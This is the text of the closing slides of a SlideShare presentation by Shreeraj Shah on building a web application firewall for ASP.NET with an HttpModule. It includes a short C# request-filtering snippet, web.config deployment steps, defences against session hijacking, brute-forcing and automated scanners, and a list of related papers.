    106. Processing POST • Processing POST request bytes. if(post.Length > 0) { for(int k=0;k<post.Length;k++) { string[] p = setPattern(postreq,post[k],0); if(p.Length>0) { app.Response.Write("Security Error"); app.Response.End(); } } } Shreeraj Shah
    107. Deploying web application firewall • Put dll in /bin folder. • Add following lines into your web.config file. • Web application firewall get loaded. <httpModules> <add type=“firewall.WebAppWall, WebAppMod" name="WebAppWall" /> </httpModules> Shreeraj Shah
    108. Impact of web application wall Before After Shreeraj Shah
    109. Defense strategies All security attributes can be guarded G by firewall. We can log or provide IDS using G same module Some of the deployment parameters G can be implemented using this method. IHttpHandler can be developed in G similar way. Shreeraj Shah
    110. Session management Session object can be used in HTTP G pipeline and session can be strengthen. Session hijacking is common issue G and critical problem with security. IHttpHandler or Module can be used G to provides solid defense against it. Shreeraj Shah
    111. Application Bruteforcing Application has forms and via that G username and password get sent using POST. Application bruteforcing is common G attack type. HttpModule can capture these G attacks and on count basis this attack can be avoided. Shreeraj Shah
    112. Automated attacks Automated web application attack G tools are out there. Crawling the site and then launch G attacks. This can be avoided by setting “honey traps” using HttpModule. Once it is trapped attacker can be G put into infinite loop using defense trick. Shreeraj Shah
    113. Browser catching Detecting browser using HttpModule. G Making sure request is coming from G browser by java script processing and cookie handling. Interesting trick. G Shreeraj Shah
    114. Papers Assessing Web App Security with Mozilla http://www.oreillynet.com/pub/a/security/2005/10/20/web_vulnerabilities.html Securing Web Services with mod_security http://www.oreillynet.com/pub/a/onlamp/2005/06/09/wss_security.html Web Services – Attacks and Defense http://www.infosecwriters.com/texts.php?op=display&id=235 Web Application Footprints and Discovery http://www.infosecwriters.com/texts.php?op=display&id=259 Web application defense at the gates – Leveraging IHttpModule http://www.infosecwriters.com/texts.php?op=display&id=276 Web Services: Enumeration and Profiling http://www.infosecwriters.com/texts.php?op=display&id=278 Domain Footprinting for Web Applications and Web Services http://www.infosecwriters.com/texts.php?op=display&id=292 Browser Identification for Web Applications http://www.infosecwriters.com/texts.php?op=display&id=297 Microsoft ASP.NET Web Services & Secure coding Unhandled exception leads to file system disclosure and SQL injection. http://net-square.com/advisory/NS-051805-ASPNET.pdf Shreeraj Shah
    115. Thanks! shreeraj@net-square.com Shreeraj Shah

    + shreerajshreeraj, 3 years ago

    custom

    6308 views, 5 favs, 8 embeds more stats

    More info about this document

    © All Rights Reserved

    Go to text version

    • Total Views 6308
      • 6276 on SlideShare
      • 32 from embeds
    • Comments 0
    • Favorites 5
    • Downloads 0
    Most viewed embeds
    • 12 views on http://www.blueinfy.com
    • 5 views on http://websecurity.com.ua
    • 3 views on http://pcsilva.blogspot.com
    • 3 views on http://www.secguru.com
    • 3 views on http://static.slideshare.net

    more

    All embeds
    • 12 views on http://www.blueinfy.com
    • 5 views on http://websecurity.com.ua
    • 3 views on http://pcsilva.blogspot.com
    • 3 views on http://www.secguru.com
    • 3 views on http://static.slideshare.net
    • 3 views on http://knitinr.blogspot.com
    • 2 views on http://blueinfy.com
    • 1 views on http://localhost

    less

    Flagged as inappropriate Flag as inappropriate
    Flag as inappropriate

    Select your reason for flagging this presentation as inappropriate. If needed, use the feedback form to let us know more details.

    Cancel
    File a copyright complaint
    Having problems? Go to our helpdesk?

    Categories

    Tags

    -->
    Search
    RSS Feed
    What's new?

    © 2009 SlideShare Inc. All Rights Reserved